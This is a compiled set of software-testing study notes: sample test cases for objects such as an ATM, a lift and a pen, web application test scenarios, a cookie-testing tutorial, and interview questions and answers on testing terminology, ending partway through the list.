Test Cases

1.Test Case for ATM

TC 1 :- successful card insertion.
TC 2 :- unsuccessful operation due to wrong angle card insertion.
TC 3:- unsuccessful operation due to invalid account card.
TC 4:- successful entry of pin number.
TC 5:- unsuccessful operation due to wrong pin number entered 3 times.
TC 6:- successful selection of language.
TC 7:- successful selection of account type.
TC 8:- unsuccessful operation due to wrong account type selected w/r to that inserted card.
TC 9:- successful selection of withdrawal option.
TC 10:- successful selection of amount.
TC 11:- unsuccessful operation due to wrong denominations.
TC 12:- successful withdrawal operation.
TC 13:- unsuccessful withdrawal operation due to amount greater than possible balance.
TC 14:- unsuccessful due to lack of amount in ATM.
TC 15:- un due to amount greater than the day limit.
TC 16:- un due to server down.
TC 17:- un due to click cancel after insert card.
TC 18:- un due to click cancel after insert card and pin no.
TC 19:- un due to click cancel after language selection,account type selection,withdrawal selection, enter amount

2. Test cases for Traffic Signal

• verify if the traffic lights are having three lights(green,yellow,red)
• verify that the lights turn on in a sequence
• verify that lights turn on in a sequence based on time specified(green light-4.1min,yellowlight10sec,red-light 1 min)
• verify that only one light glows at a time
• verify if the speed of the Traffic light can be accelerated as time specified based on the traffic
• verify if the traffic lights in some spots are sensor activated.
• Verify that light are properly visible and dark and are on proper height so normal human eyes can see it propely at night and day.
• Verify it shows remaining time.

3.  Test case for 2 way switch

• Check whether two switches are present.
• Check whether both switches are connected properly.
• Check power supplies for both switches.
• Check on/off conditions are working properly.
• Check whether any electronic appliances connected to the 2-way switches should not get power supply when both switches are either in on state or off state.
• Check whether any electronic appliances connected to the 2-way switches should get power supply when one switch is in on state and other is in off state or vice versa.

4 . Write the test cases on Chair?

Ans.

a. Check whether the chair is very comfortable to take rest.

b. Check whether the chair is available in your favorite color.

c. Check whether the chair is made up of plastic or wood.

d. Check it has got wheels at bottom to move from one place to another place.

e. Check whether it has got some extra adds ins to stretch on back.

f. Check whether it has got any seating adjustment to make height high or low.

g. Check whether the chair seat has got some air space to flow of air.

h. Check whether the chair has got enough space to be seat with fat or thin
people.

i. Check whether the chair is up to your price.

j. Check whether the chair is very attractive.

k. (Out of box) throw the chair from 1^st or 2^nd floor to check the capacity. That is not easily breakable.

You can add some more answer and test cases…

l. Check how much weight it can handle.

5. Write the test cases on Ring?

a. It is easily in and out in the figure.

b. Verify it is not harmful to the skin.

c. Verify it is suitable in each climatic condition.

d. Check the design is very attractive.

e. Check the ring is made up of metal or gold or silver.

f. Check whether the ring is up to your price.

g. Check whether it is not breakable easily.

6. Test cases Calculator

• It should have 9 numeric digits.
• it should give proper output based on the operation.
• it should  not allow characters.
• it should run from cell or battery not through power supply.
• it should be small in size.
• at least it should perform 4 basic operation such as
• add,sub.div, multiplication

7.Write the test cases on Pen?

· Pen’s ink should be dark so that normal human eyes can read clearly.

· Pen should be continuously in writing mode.

. pen’s refill should be available in different color.

· Pen should have the soft grip at the middle place for usability.

· Pen should be in continuously writing mode under hottest and coolest temperature.

· If pen drops from the several feet then also it should be in continuously writing mode if ink is available in pen.

· Pen should not be “Use and throw” type.

· Pen’s refill should be replaceable.

· Pen shape should be straight.

. Pen height and size should be as per standards so than can user can easily carry and hold it.

8. Write the test cases on bulb?

• Check the bulb is required shape and size
• Check the bulb is fitted and removed from holder
• Check the bulb glow required illumination are not
• Check the bulb it should glow when we switch on
• Check the bulb it should off when we switch off
• Check the bulb material
• Life of the bulb should meet the requirement

8. Test Case for Yahoo Page

• Check the Logo of Yahoo on yahoo page when yahoo page get open.
• Check the UI of yahoo page.
• Testing without entering any username and password.
• Test it only with Username
• Test it only with password.
• User name with wrong password
• Password with wrong user name
• Right username and right password
• Cancel, after entering username and password.
• Enter long username and password that exceeds the set limit of characters.
• Try copy/paste in the password text box.
• After successful sign-out, try “Back” option from your browser. Check whether it gets you to the “signed-in” page.

9. Test cases on bottle:

• Check whether the bottle is made up of plastic or glass.
• Check it is available in various color.
• To check whether it does not have any leakage.
• checking its base so that we can steady on plan surface.
• If it is made up from glass then its behavior in deep freezer.
• Through it from some height to check it is not easily breakable.
• check it in each climatic condition.
• Verify that it should contain cold as well as hot water/liquid or not.

10. Test case for Lift?

1. Check for the appropriate no of buttons?
2. What happen if I touch the open button twice?
3. What happen when I press open button while lift is
moving and it is in the middle of the two floors.
4. What happen when I press the open button for some time?
5. Check for the sound when lift is opening.
6. Check for the direction by pressing up and down button.
7. Enter in the lift specify the floor say 4 and check for
the corresponding floor?
8. Lift is moving and the power break off. Does the alarm
blow in the control room that there is power break off?
9. Also check for the case how the inside person inform the
lift man that he got stuck in the lift (if there is phone
button does it works)?
10. Also check for the response time to start lift again?
11. When a person is in the lift any light is there or not?
12. How many persons at a time will carry the lift in the
since in moving time.
13. With out load if we press the up button is it moving or
not.
14. What happen with out specifying the floor number if we
press the up or down?
15. What happen if the lift is in over load mode (over load
sound will come before moving or it moves).
16. With out load if we press the up button and specify the
floor number what is happening?
17. Is the door get closed itself or have to close manually.
18. If the door closed automatically check for the closing
time?
19. If the door closed automatically also check for the
sensor? Suppose the closing time is 2 min and it passed and
people are still getting in. What happen does the door get
closed or wait for the people to get in?
20. What happen when you press the same floor number on
which lift is already there?
21. After getting into the lift one person is there he
wants to go up but we want to go down already he specified
the floor number before we enter in to the lift. After that
we specified our floor number then what will be the
priority of the lift?
22. Lift is empty and is moving downwards I entered and
want to go up. Is there the button to change the direction
of lift and the button working?
23. Is the floor number displayed up in side the lift
correct?
24. When happen when the out side person want to open the
door but
Inside person wants to close the door at the same time.

Performance Testing Test Scenarios

1. Check if page load time is within acceptable range 2. Check page load on slow connections 3. Check response time for any action under light, normal, moderate and heavy load conditions 4. Check performance of database stored procedures and triggers 5. Check database query execution time 6. Check for load testing of application 7. Check for stress testing of application 8. Check CPU and memory usage under peak load condition

Database Testing Test Scenarios

1. Check if correct data is getting saved in database upon successful page submit 2. Check values for columns which are not accepting null values 3. Check for data integrity. Data should be stored in single or multiple tables based on design 4. Index names should be given as per the standards e.g. IND__ 5. Tables should have primary key column 6. Table columns should have description information available (except for audit columns like created date, created by etc.) 7. For every database add/update operation log should be added 8. Required table indexes should be created 9. Check if data is committed to database only when the operation is successfully completed 10. Data should be rolled back in case of failed transactions 11. Database name should be given as per the application type i.e. test, UAT, sandbox, live (though this is not a standard it is helpful for database maintenance) 12. Database logical names should be given according to database name (again this is not standard but helpful for DB maintenance) 13. Stored procedures should not be named with prefix “sp_” 14. Check is values for table audit columns (like createddate, createdby, updatedate, updatedby, isdeleted, deleteddate, deletedby etc.) are populated properly 15. Check if input data is not truncated while saving. Field length shown to user on page and in database schema should be same 16. Check numeric fields with minimum, maximum, and float values 17. Check numeric fields with negative values (for both acceptance and non-acceptance) 18. Check if radio button and dropdown list options are saved correctly in database 19. Check if database fields are designed with correct data type and data length 20. Check if all table constraints like Primary key, Foreign key etc. are implemented correctly 21. Test stored procedures and triggers with sample input data 22. Input field leading and trailing spaces should be truncated before committing data to database 23. Null values should not be allowed for Primary key column

GUI and Usability Test Scenarios

1. All fields on page (e.g. text box, radio options, dropdown lists) should be aligned properly 2. Numeric values should be right justified unless specified otherwise 3. Enough space should be provided between field labels, columns, rows, error messages etc. 4. Scroll bar should be enabled only when necessary 5. Font size, style and color for headline, description text, labels, infield data, and grid info should be standard as specified in SRS 6. Description text box should be multi-line 7. Disabled fields should be grayed out and user should not be able to set focus on these fields 8. Upon click of any input text field, mouse arrow pointer should get changed to cursor 9. User should not be able to type in drop down select lists 10. Information filled by users should remain intact when there is error message on page submit. User should be able to submit the form again by correcting the errors 11. Check if proper field labels are used in error messages 12. Dropdown field values should be displayed in defined sort order 13. Tab and Shift+Tab order should work properly 14. Default radio options should be pre-selected on page load 15. Field specific and page level help messages should be available 16. Check if correct fields are highlighted in case of errors 17. Check if dropdown list options are readable and not truncated due to field size limit 18. All buttons on page should be accessible by keyboard shortcuts and user should be able to perform all operations using keyboard 19. Check all pages for broken images 20. Check all pages for broken links 21. All pages should have title 22. Confirmation messages should be displayed before performing any update or delete operation 23. Hour glass should be displayed when application is busy 24. Page text should be left justified 25. User should be able to select only one radio option and any combination for check boxes.

General Test Scenarios

1. All mandatory fields should be validated and indicated by asterisk (*) symbol 2. Validation error messages should be displayed properly at correct position 3. All error messages should be displayed in same CSS style (e.g. using red color) 4. General confirmation messages should be displayed using CSS style other than error messages style (e.g. using green color) 5. Tool tips text should be meaningful 6. Dropdown fields should have first entry as blank or text like ‘Select’ 7. Delete functionality for any record on page should ask for confirmation 8. Select/deselect all records options should be provided if page supports record add/delete/update functionality 9. Amount values should be displayed with correct currency symbols 10. Default page sorting should be provided 11. Reset button functionality should set default values for all fields 12. All numeric values should be formatted properly 13. Input fields should be checked for max field value. Input values greater than specified max limit should not be accepted or stored in database 14. Check all input fields for special characters 15. Field labels should be standard e.g. field accepting user’s first name should be labeled properly as ‘First Name’ 16. Check page sorting functionality after add/edit/delete operations on any record 17. Check for timeout functionality. Timeout values should be configurable. Check application behavior after operation timeout 18. Check cookies used in an application 19. Check if downloadable files are pointing to correct file paths 20. All resource keys should be configurable in config files or database instead of hard coding 21. Standard conventions should be followed throughout for naming resource keys 22. Validate markup for all web pages (validate HTML and CSS for syntax errors) to make sure it is compliant with the standards 23. Application crash or unavailable pages should be redirected to error page 24. Check text on all pages for spelling and grammatical errors 25. Check numeric input fields with character input values. Proper validation message should appear 26. Check for negative numbers if allowed for numeric fields 27. Check amount fields with decimal number values 28. Check functionality of buttons available on all pages 29. User should not be able to submit page twice by pressing submit button in quick succession. 30. Divide by zero errors should be handled for any calculations 31. Input data with first and last position blank should be handled correctly

SQL Join

Cookie Testing

What is Cookie?
Cookie is small information stored in text file on user’s hard drive by web server. This information is later used by web browser to retrieve information from that machine. Generally cookie contains personalized user data or information that is used to communicate between different web pages.
Why Cookies are used?
Cookies are nothing but the user’s identity and used to track where the user navigated throughout the web site pages. The communication between web browser and web server is stateless.
For example if you are accessing domain http://www.example.com/1.html then web browser will simply query to example.com web server for the page 1.html. Next time if you type page as http://www.example.com/2.html then new request is send to example.com web server for sending 2.html page and web server don’t know anything about to whom the previous page 1.html served.
What if you want the previous history of this user communication with the web server? You need to maintain the user state and interaction between web browser and web server somewhere. This is where cookie comes into picture. Cookies serve the purpose of maintaining the user interactions with web server.
How cookies work?
The HTTP protocol used to exchange information files on the web is used to maintain the cookies. There are two types of HTTP protocol. Stateless HTTP and Stateful HTTP protocol. Stateless HTTP protocol does not keep any record of previously accessed web page history. While Stateful HTTP protocol do keep some history of previous web browser and web server interactions and this protocol is used by cookies to maintain the user interactions.
Whenever user visits the site or page that is using cookie, small code inside that HTML page (Generally a call to some language script to write the cookie like cookies in JAVAScript, PHP, Perl) writes a text file on users machine called cookie.
Here is one example of the code that is used to write cookie and can be placed inside any HTML page:
Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME;
When user visits the same page or domain later time this cookie is read from disk and used to identify the second visit of the same user on that domain. Expiration time is set while writing the cookie. This time is decided by the application that is going to use the cookie.
Generally two types of cookies are written on user machine.
1) Session cookies: This cookie is active till the browser that invoked the cookie is open. When we close the browser this session cookie gets deleted. Some time session of say 20 minutes can be set to expire the cookie.
2) Persistent cookies: The cookies that are written permanently on user machine and lasts for months or years.
Where cookies are stored?
When any web page application writes cookie it get saved in a text file on user hard disk drive. The path where the cookies get stored depends on the browser. Different browsers store cookie in different paths. E.g. Internet explorer store cookies on path “C:\Documents and Settings\Default User\Cookies”
Here the “Default User” can be replaced by the current user you logged in as. Like “Administrator”, or user name like “Vijay” etc.
The cookie path can be easily found by navigating through the browser options. In Mozilla Firefox browser you can even see the cookies in browser options itself. Open the Mozila browser, click on Tools->Options->Privacy and then “Show cookies” button.
How cookies are stored?
Lets take example of cookie written by rediff.com on Mozilla Firefox browser:
On Mozilla Firefox browser when you open the page rediff.com or login to your rediffmail account, a cookie will get written on your Hard disk. To view this cookie simply click on “Show cookies” button mentioned on above path. Click on Rediff.com site under this cookie list. You can see different cookies written by rediff domain with different names.
Site: Rediff.com Cookie name: RMID
Name: RMID (Name of the cookie)
Content: 1d11c8ec44bf49e0… (Encrypted content)
Domain: .rediff.com
Path: / (Any path after the domain name)
Send For: Any type of connection
Expires: Thursday, December 31, 2020 11:59:59 PM
Applications where cookies can be used:
1) To implement shopping cart:
Cookies are used for maintaining online ordering system. Cookies remember what user wants to buy. What if user adds some products in their shopping cart and if due to some reason user don’t want to buy those products this time and closes the browser window? When next time same user visits the purchase page he can see all the products he added in shopping cart in his last visit.
2) Personalized sites:
When user visits certain pages they are asked which pages they don’t want to visit or display. User options are get stored in cookie and till the user is online, those pages are not shown to him.
3) User tracking:
To track number of unique visitors online at particular time.
4) Marketing:
Some companies use cookies to display advertisements on user machines. Cookies control these advertisements. When and which advertisement should be shown? What is the interest of the user? Which keywords he searches on the site? All these things can be maintained using cookies.
5) User sessions:
Cookies can track user sessions to particular domain using user ID and password.
Drawbacks of cookies:
1) Even writing Cookie is a great way to maintain user interaction, if user has set browser options to warn before writing any cookie or disabled the cookies completely then site containing cookie will be completely disabled and can not perform any operation resulting in loss of site traffic.
2) Too many Cookies:
If you are writing too many cookies on every page navigation and if user has turned on option to warn before writing cookie, this could turn away user from your site.
3) Security issues:
Some times users personal information is stored in cookies and if someone hack the cookie then hacker can get access to your personal information. Even corrupted cookies can be read by different domains and lead to security issues.
4) Sensitive information:
Some sites may write and store your sensitive information in cookies, which should not be allowed due to privacy concerns.
This should be enough to know what cookies are. If you want more cookie info see Cookie Central page.
Some Major Test cases for web application cookie testing:
The first obvious test case is to test if your application is writing cookies properly on disk. You can use the Cookie Tester application also if you don’t have any web application to test but you want to understand the cookie concept for testing.
Test cases:
1) As a Cookie privacy policy make sure from your design documents that no personal or sensitive data is stored in the cookie.
2) If you have no option than saving sensitive data in cookie make sure data stored in cookie is stored in encrypted format.
3) Make sure that there is no overuse of cookies on your site under test. Overuse of cookies will annoy users if browser is prompting for cookies more often and this could result in loss of site traffic and eventually loss of business.
4) Disable the cookies from your browser settings: If you are using cookies on your site, your sites major functionality will not work by disabling the cookies. Then try to access the web site under test. Navigate through the site. See if appropriate messages are displayed to user like “For smooth functioning of this site make sure that cookies are enabled on your browser”. There should not be any page crash due to disabling the cookies. (Please make sure that you close all browsers, delete all previously written cookies before performing this test)
5) Accepts/Reject some cookies: The best way to check web site functionality is, not to accept all cookies. If you are writing 10 cookies in your web application then randomly accept some cookies say accept 5 and reject 5 cookies. For executing this test case you can set browser options to prompt whenever cookie is being written to disk. On this prompt window you can either accept or reject cookie. Try to access major functionality of web site. See if pages are getting crashed or data is getting corrupted.
6) Delete cookie: Allow site to write the cookies and then close all browsers and manually delete all cookies for web site under test. Access the web pages and check the behavior of the pages.
7) Corrupt the cookies: Corrupting cookie is easy. You know where cookies are stored. Manually edit the cookie in notepad and change the parameters to some vague values. Like alter the cookie content, Name of the cookie or expiry date of the cookie and see the site functionality. In some cases corrupted cookies allow to read the data inside it for any other domain. This should not happen in case of your web site cookies. Note that the cookies written by one domain say rediff.com can’t be accessed by other domain say yahoo.com unless and until the cookies are corrupted and someone trying to hack the cookie data.
8 ) Checking the deletion of cookies from your web application page: Some times cookie written by domain say rediff.com may be deleted by same domain but by different page under that domain. This is the general case if you are testing some ‘action tracking’ web portal. Action tracking or purchase tracking pixel is placed on the action web page and when any action or purchase occurs by user the cookie written on disk get deleted to avoid multiple action logging from same cookie. Check if reaching to your action or purchase page deletes the cookie properly and no more invalid actions or purchase get logged from same user.
9) Cookie Testing on Multiple browsers: This is the important case to check if your web application page is writing the cookies properly on different browsers as intended and site works properly using these cookies. You can test your web application on Major used browsers like Internet explorer (Various versions), Mozilla Firefox, Netscape, Opera etc.
10) If your web application is using cookies to maintain the logging state of any user then log in to your web application using some username and password. In many cases you can see the logged in user ID parameter directly in browser address bar. Change this parameter to different value say if previous user ID is 100 then make it 101 and press enter. The proper access message should be displayed to user and user should not be able to see other users account.
These are some Major test cases to be considered while testing website cookies. You can write multiple test cases from these test cases by performing various combinations. If you have some different application scenario, you can mention your test cases in comments below.

Interview Software Testing

1. What is Test Bed?
An execution environment configured for testing. May consist of specific hardware, OS, network topology, configuration of the product under test, other application or system software, etc. The Test Plan for a project should enumerated the test beds(s) to be used.

2. What is Test Case?
Test Case is a commonly used term for a specific test. This is usually the smallest unit of testing. A Test Case will consist of information such as requirements testing, test steps, verification steps, prerequisites, outputs, test environment, etc. A set of inputs, execution preconditions, and expected outcomes developed for a particular objective, such as to exercise a particular program path or to verify compliance with a specific requirement. Test Driven Development? Testing methodology associated with Agile Programming in which every chunk of code is covered by unit tests, which must all pass all the time, in an effort to eliminate unit-level and regression bugs during development. Practitioners of TDD write a lot of tests, i.e. an equal number of lines of test code to the size of the production code.

3. What is Test Driver?
A program or test tool used to execute a tests. Also known as a Test Harness.

4. What is Test Environment?
The hardware and software environment in which tests will be run, and any other software with which the software under test interacts when under test including stubs and test drivers.

5. What is Test First Design?
Test-first design is one of the mandatory practices of Extreme Programming (XP).It requires that programmers do not write any production code until they have first written a unit test.

6. What is Test Harness?
A program or test tool used to execute a tests. Also known as a Test Driver.

7. What is Test Plan?
A document describing the scope, approach, resources, and schedule of intended testing activities. It identifies test items, the features to be tested, the testing tasks, who will do each task, and any risks requiring contingency planning.

8. What is Test Procedure?
A document providing detailed instructions for the execution of one or more test cases.

9. What is Test Script?
Commonly used to refer to the instructions for a particular test that will be carried out by an automated test tool.

10. What is Test Specification?
A document specifying the test approach for a software feature or combination or features and the inputs, predicted results and execution conditions for the associated tests.

11. What is Test Suite?
A collection of tests used to validate the behavior of a product. The scope of a Test Suite varies from organization to organization. There may be several Test Suites for a particular product for example. In most cases however a Test Suite is a high level concept, grouping together hundreds or thousands of tests related by what they are intended to test.

12. What is Test Tools?
Computer programs used in the testing of a system, a component of the system, or its documentation.

13. What is Thread Testing?
A variation of top-down testing where the progressive integration of components follows the implementation of subsets of the requirements, as opposed to the integration of components by successively lower levels.

14. What is Top Down Testing?
An approach to integration testing where the component at the top of the component hierarchy is tested first, with lower level components being simulated by stubs. Tested components are then used to test lower level components. The process is repeated until the lowest level components have been tested.

15. What is Total Quality Management?
A company commitment to develop a process that achieves high quality product and customer satisfaction.

16. What is Traceability Matrix?
A document showing the relationship between Test Requirements and Test Cases.

17. What is Usability Testing?
Testing the ease with which users can learn and use a product.

18. What is Use Case?
The specification of tests that are conducted from the end-user perspective. Use cases tend to focus on operating software as an end-user would conduct their day-to-day activities.

19. What is Unit Testing?
Testing of individual software components.

20. What is Validation?
The process of evaluating software at the end of the software development process to ensure compliance with software requirements. The techniques for validation is testing, inspection and reviewing.

21. What is Verification?
The process of determining whether of not the products of a given phase of the software development cycle meet the implementation steps and can be traced to the incoming objectives established during the previous phase. The techniques for verification are testing, inspection and reviewing.

22. What is White Box Testing?
Testing based on an analysis of internal workings and structure of a piece of software. Includes techniques such as Branch Testing and Path Testing. Also known as Structural Testing and Glass Box Testing. Contrast with Black Box Testing. White box testing is used to test the internal logic of the code for ex checking whether the path has been executed once, checking whether the branches has been executed atleast once .....Used to check the structure of the code.

23. What is Workflow Testing?
Scripted end-to-end testing which duplicates specific workflows which are expected to be utilized by the end-user.

24. What's the difference between load and stress testing ?
One of the most common, but unfortunate misuse of terminology is treating “load testing” and “stress testing” as synonymous. The consequence of this ignorant semantic abuse is usually that the system is neither properly “load tested” nor subjected to a meaningful stress test. Stress testing is subjecting a system to an unreasonable load while denying it the resources (e.g., RAM, disc, mips, interrupts, etc.) needed to process that load. The idea is to stress a system to the breaking point in order to find bugs that will make that break potentially harmful. The system is not expected to process the overload without adequate resources, but to behave (e.g., fail) in a decent manner (e.g., not corrupting or losing data). Bugs and failure modes discovered under stress testing may or may not be repaired depending on the application, the failure mode, consequences, etc. The load (incoming transaction stream) in stress testing is often deliberately distorted so as to force the system into resource depletion. Load testing is subjecting a system to a statistically representative (usually) load. The two main reasons for using such loads is in support of software reliability testing and in performance testing. The term 'load testing' by itself is too vague and imprecise to warrant use. For example, do you mean representative load,' 'overload,' 'high load,' etc. In performance testing, load is varied from a minimum (zero) to the maximum level the system can sustain without running out of resources or having, transactions >suffer (application-specific) excessive delay. A third use of the term is as a test whose objective is to determine the maximum sustainable load the system can handle. In this usage, 'load testing' is merely testing at the highest transaction arrival rate in performance testing.

25. What's the difference between QA and testing?
QA is more a preventive thing, ensuring quality in the company and therefore the product rather than just testing the product for software bugs? TESTING means 'quality control' QUALITY CONTROL measures the quality of a product QUALITY ASSURANCE measures the quality of processes used to create a quality product.

26. What is the best tester to developer ratio?
Reported tester: developer ratios range from 10:1 to 1:10. There's no simple answer. It depends on so many things, Amount of reused code, number and type of interfaces, platform, quality goals, etc. It also can depend on the development model. The more specs, the less testers. The roles can play a big part also. Does QA own beta? Do you include process auditors or planning activities? These figures can all vary very widely depending on how you define 'tester' and 'developer'. In some organizations, a 'tester' is anyone who happens to be testing software at the time -- such as their own. In other organizations, a 'tester' is only a member of an independent test group. It is better to ask about the test labor content than it is to ask about the tester/developer ratio. The test labor content, across most applications is generally accepted as 50%, when people do honest accounting. For life-critical software, this can go up to 80%.

27. How can new Software QA processes be introduced in an existing organization?
- A lot depends on the size of the organization and the risks involved. For large organizations with high-risk (in terms of lives or property) projects, serious management buy-in is required and a formalized QA process is necessary. - Where the risk is lower, management and organizational buy-in and QA implementation may be a slower, step-at-a-time process. QA processes should be balanced with productivity so as to keep bureaucracy from getting out of hand. - For small groups or projects, a more ad-hoc process may be appropriate, depending on the type of customers and projects. A lot will depend on team leads or managers, feedback to developers, and ensuring adequate communications among customers, managers, developers, and testers. - In all cases the most value for effort will be in requirements management processes, with a goal of clear, complete, testable requirement specifications or expectations.

28. What are 5 common problems in the software development process?
1. poor requirements - if requirements are unclear, incomplete, too general, or not testable, there will be problems. 2. unrealistic schedule - if too much work is crammed in too little time, problems are inevitable. 3. inadequate testing - no one will know whether or not the program is any good until the customer complains or systems crash. 4. features - requests to pile on new features after development is underway; extremely common. 5. miscommunication - if developers don't know what's needed or customer's have erroneous expectations, problems are guaranteed.

29. What are 5 common solutions to software development problems?
1. solid requirements - clear, complete, detailed, cohesive, attainable, testable requirements that are agreed to by all players. Use prototypes to help nail down requirements. 2. realistic schedules - allow adequate time for planning, design, testing, bug fixing, re-testing, changes, and documentation; personnel should be able to complete the project without burning out. 3. adequate testing - start testing early on, re-test after fixes or changes, plan for adequate time for testing and bug-fixing. 4. stick to initial requirements as much as possible - be prepared to defend against changes and additions once development has begun, and be prepared to explain consequences. If changes are necessary, they should be adequately reflected in related schedule changes. If possible, use rapid prototyping during the design phase so that customers can see what to expect. This will provide them a higher comfort level with their requirements decisions and minimize changes later on. 5. communication - require walkthroughs and inspections when appropriate; make extensive use of group communication tools - e-mail, groupware, networked bug-tracking tools and change management tools, intranet capabilities, etc.; insure that documentation is available and up-to-date - preferably electronic, not paper; promote teamwork and cooperation; use prototypes early on so that customers' expectations are clarified.

30. What is 'good code'?
'Good code' is code that works, is bug free, and is readable and maintainable. Some organizations have coding 'standards' that all developers are supposed to adhere to, but everyone has different ideas about what's best, or what is too many or too few rules. There are also various theories and metrics, such as McCabe Complexity metrics. It should be kept in mind that excessive use of standards and rules can stifle productivity and creativity. 'Peer reviews', 'buddy checks' code analysis tools, etc. can be used to check for problems and enforce standards. For C and C++ coding, here are some typical ideas to consider in setting rules/standards; these may or may not apply to a particular situation: - minimize or eliminate use of global variables. - use descriptive function and method names - use both upper and lower case, avoid abbreviations, use as many characters as necessary to be adequately descriptive (use of more than 20 characters is not out of line); be consistent in naming conventions. - use descriptive variable names - use both upper and lower case, avoid abbreviations, use as many characters as necessary to be adequately descriptive (use of more than 20 characters is not out of line); be consistent in naming conventions. - function and method sizes should be minimized; less than 100 lines of code is good, less than 50 lines is preferable. - function descriptions should be clearly spelled out in comments preceding a function's code.- organize code for readability. - use whitespace generously - vertically and horizontally - each line of code should contain 70 characters max. - one code statement per line. - coding style should be consistent throughout a program (eg, use of brackets, indentations, naming conventions, etc.) - in adding comments, err on the side of too many rather than too few comments; a common rule of thumb is that there should be at least as many lines of comments (including header blocks) as lines of code. - no matter how small, an application should include documentation of the overall program function and flow (even a few paragraphs is better than nothing); or if possible a separate flow chart and detailed program documentation. - make extensive use of error handling procedures and status and error logging. - for C++, to minimize complexity and increase maintainability, avoid too many levels of inheritance in class hierarchies (relative to the size and complexity of the application). Minimize use of multiple inheritance, and minimize use of operator overloading (note that the Java programming language eliminates multiple inheritance and operator overloading.) - for C++, keep class methods small, less than 50 lines of code per method is preferable. - for C++, make liberal use of exception handlers

31. What is 'good design'?
'Design' could refer to many things, but often refers to 'functional design' or 'internal design'. Good internal design is indicated by software code whose overall structure is clear, understandable, easily modifiable, and maintainable; is robust with sufficient error-handling and status logging capability; and works correctly when implemented. Good functional design is indicated by an application whose functionality can be traced back to customer and end-user requirements. For programs that have a user interface, it's often a good idea to assume that the end user will have little computer knowledge and may not read a user manual or even the on-line help; some common rules-of-thumb include: - the program should act in a way that least surprises the user - it should always be evident to the user what can be done next and how to exit - the program shouldn't let the users do something stupid without warning them.

32. What makes a good test engineer?
A good test engineer has a 'test to break' attitude, an ability to take the point of view of the customer, a strong desire for quality, and an attention to detail. Tact and diplomacy are useful in maintaining a cooperative relationship with developers, and an ability to communicate with both technical (developers) and non-technical (customers, management) people is useful. Previous software development experience can be helpful as it provides a deeper understanding of the software development process, gives the tester an appreciation for the developers' point of view, and reduce the learning curve in automated test tool programming. Judgment skills are needed to assess high-risk areas of an application on which to focus testing efforts when time is limited.

33. What makes a good Software QA engineer?
The same qualities a good tester has are useful for a QA engineer. Additionally, they must be able to understand the entire software development process and how it can fit into the business approach and goals of the organization. Communication skills and the ability to understand various sides of issues are important. In organizations in the early stages of implementing QA processes, patience and diplomacy are especially needed. An ability to find problems as well as to see 'what's missing' is important for inspections and reviews.

34. What makes a good QA or Test manager?
A good QA, test, or QA/Test(combined) manager should: - be familiar with the software development process - be able to maintain enthusiasm of their team and promote a positive atmosphere, despite what is a somewhat 'negative' process (e.g., looking for or preventing problems) - be able to promote teamwork to increase productivity - be able to promote cooperation between software, test, and QA engineers - have the diplomatic skills needed to promote improvements in QA processes -have the ability to withstand pressures and say 'no' to other managers when quality is insufficient or QA processes are not being adhered to - have people judgement skills for hiring and keeping skilled personnel- be able to communicate with technical and non-technical people, engineers, managers, and customers. - be able to run meetings and keep them focused

35. What's the role of documentation in QA?
Critical. (Note that documentation can be electronic, not necessarily paper.) QA practices should be documented such that they are repeatable. Specifications, designs, business rules, inspection reports, configurations, code changes, test plans, test cases, bug reports, user manuals, etc. should all be documented. There should ideally be a system for easily finding and obtaining documents and determining what documentation will have a particular piece of information. Change management for documentation should be used if possible.

36. What's the big deal about 'requirements'?
One of the most reliable methods of insuring problems, or failure, in a complex software project is to have poorly documented requirements specifications. Requirements are the details describing an application's externally-perceived functionality and properties. Requirements should be clear, complete, reasonably detailed, cohesive, attainable, and testable. A non-testable requirement would be, for example, 'user-friendly' (too subjective). A testable requirement would be something like 'the user must enter their previously-assigned password to access the application'. Determining and organizing requirements details in a useful and efficient way can be a difficult effort; different methods are available depending on the particular project. Many books are available that describe various approaches to this task. Care should be taken to involve ALL of a project's significant 'customers' in the requirements process. 'Customers' could be in-house personnel or out, and could include end-users, customer acceptance testers, customer contract officers, customer management, future software maintenance engineers, salespeople, etc. Anyone who could later derail the project if their expectations aren't met should be included if possible. Organizations vary considerably in their handling of requirements specifications. Ideally, the requirements are spelled out in a document with statements such as 'The product shall.....'. 'Design' specifications should not be confused with 'requirements'; design specifications should be traceable back to the requirements. In some organizations requirements may end up in high level project plans, functional specification documents, in design documents, or in other documents at various levels of detail. No matter what they are called, some type of documentation with detailed requirements will be needed by testers in order to properly plan and execute tests. Without such documentation, there will be no clear-cut way to determine if a software application is performing correctly.

37. What steps are needed to develop and run software tests?
The following are some of the steps to consider: - Obtain requirements, functional design, and internal design specifications and other necessary documents - Obtain budget and schedule requirements - Determine project-related personnel and their responsibilities, reporting requirements, required standards and processes (such as release processes, change processes, etc.) - Identify application's higher-risk aspects, set priorities, and determine scope and limitations of tests - Determine test approaches and methods - unit, integration, functional, system, load, usability tests, etc. - Determine test environment requirements (hardware, software, communications, etc.) -Determine testware requirements (record/playback tools, coverage analyzers, test tracking, problem/bug tracking, etc.) - Determine test input data requirements - Identify tasks, those responsible for tasks, and labor requirements - Set schedule estimates, timelines, milestones - Determine input equivalence classes, boundary value analyses, error classes - Prepare test plan document and have needed reviews/approvals - Write test cases - Have needed reviews/inspections/approvals of test cases - Prepare test environment and testware, obtain needed user manuals/reference documents/configuration guides/installation guides, set up test tracking processes, set up logging and archiving processes, set up or obtain test input data - Obtain and install software releases - Perform tests - Evaluate and report results - Track problems/bugs and fixes - Retest as needed - Maintain and update test plans, test cases, test environment, and testware through life cycle

38. What is 'configuration management'?
Configuration management covers the processes used to control, coordinate, and track: code, requirements, documentation, problems, change requests, designs, tools/compilers/libraries/patches, changes made to them, and who makes the changes.

39. What if the software is so buggy it can't really be tested at all?
The best bet in this situation is for the testers to go through the process of reporting whatever bugs or blocking-type problems initially show up, with the focus being on critical bugs. Since this type of problem can severely affect schedules, and indicates deeper problems in the software development process (such as insufficient unit testing or insufficient integration testing, poor design, improper build or release procedures, etc.) managers should be notified, and provided with some documentation as evidence of the problem.

40. How can it be known when to stop testing?
This can be difficult to determine. Many modern software applications are so complex, and run in such an interdependent environment, that complete testing can never be done. Common factors in deciding when to stop are: - Deadlines (release deadlines, testing deadlines, etc.)- Test cases completed with certain percentage passed - Test budget depleted - Coverage of code/functionality/requirements reaches a specified point - Bug rate falls below a certain level - Beta or alpha testing period ends

41. What if there isn't enough time for thorough testing?
